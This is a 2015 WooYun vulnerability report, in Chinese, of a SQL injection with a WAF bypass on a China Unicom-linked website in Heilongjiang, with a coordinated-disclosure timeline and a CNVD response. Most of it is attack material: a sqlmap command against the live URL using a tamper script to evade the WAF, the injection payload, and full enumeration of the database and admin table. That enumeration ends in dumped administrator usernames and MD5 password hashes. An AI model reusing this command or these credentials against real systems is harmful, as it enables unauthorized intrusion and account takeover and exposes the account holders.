当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0129854

漏洞标题:运营商安全之黑龙江联通绕过SQL注入绕过WAF

相关厂商:中国联通

漏洞作者: 路人甲

提交时间:2015-07-30 12:11

修复时间:2015-09-17 10:46

公开时间:2015-09-17 10:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-30: 细节已通知厂商并且等待厂商处理中
2015-08-03: 厂商已经确认,细节仅向厂商公开
2015-08-13: 细节向核心白帽子及相关领域专家公开
2015-08-23: 细节向普通白帽子公开
2015-09-02: 细节向实习白帽子公开
2015-09-17: 细节向公众公开

简要描述:

详细说明:

sqlmap.py -u "http://www.chinaunicomsi.cn/cnc/cncsi.asp?id=%5c" --tamper=space2mssqlblank.py --current-db


有WAF,加个tamper=space2mssqlblank.py脚本即可绕过

1.jpg


2.jpg


3.jpg


sqlmap identified the following injection points with a total of 65 HTTP(s) requests:
---
Parameter: id (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6037=6037) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(113)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6037=6037) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(113)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
current database:    'oyy'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6037=6037) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(113)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
Database: oyy
[16 tables]
+-----------------+
| Admin           |
| BigClass_down   |
| Download        |
| Feedback        |
| News            |
| SmallClass      |
| SmallClass_down |
| WebBasicInfo    |
| bigClass        |
| book_setup      |
| dtproperties    |
| gonggao         |
| shop_pinglun    |
| sogo_link       |
| sysconstraints  |
| syssegments     |
+-----------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6037=6037) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(113)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
Database: oyy
Table: admin
[12 columns]
+---------------------+----------+
| Column              | Type     |
+---------------------+----------+
| Addtime             | datetime |
| admin               | nvarchar |
| aleave              | nvarchar |
| ArticleNum          | int      |
| bigclassauthorize   | nvarchar |
| ID                  | int      |
| LastLogintime       | datetime |
| LoginIP             | nvarchar |
| LoginNum            | int      |
| password            | nvarchar |
| smallclassauthorize | nvarchar |
| userkey             | int      |
+---------------------+----------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6037=6037) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(113)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
Database: oyy
Table: admin
[8 entries]
+---------+----------------------------------+
| admin   | password                         |
+---------+----------------------------------+
| admin   | 0cc175b9c0f1b6a831c399e269772661 |
| liubin  | 790a26695c7c9f38fa32d95bfa6b8e4a |
| liujia  | b9181c2c34c3a4200643799ded066a29 |
| oyaya   | 0cc175b9c0f1b6a831c399e269772661 |
| test    | 0cc175b9c0f1b6a831c399e269772661 |
| twhd    | 0e263a2a84460a460cc77ee5be06d0ac |
| wangll  | 927941f81c139547f7b5ff053498638c |
| zhangll | 3077bb4f20cf94e87aa0796eeb078fe3 |
+---------+----------------------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-08-03 10:45

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给黑龙江分中心,由其后续协调网站管理单位处置。

最新状态:

暂无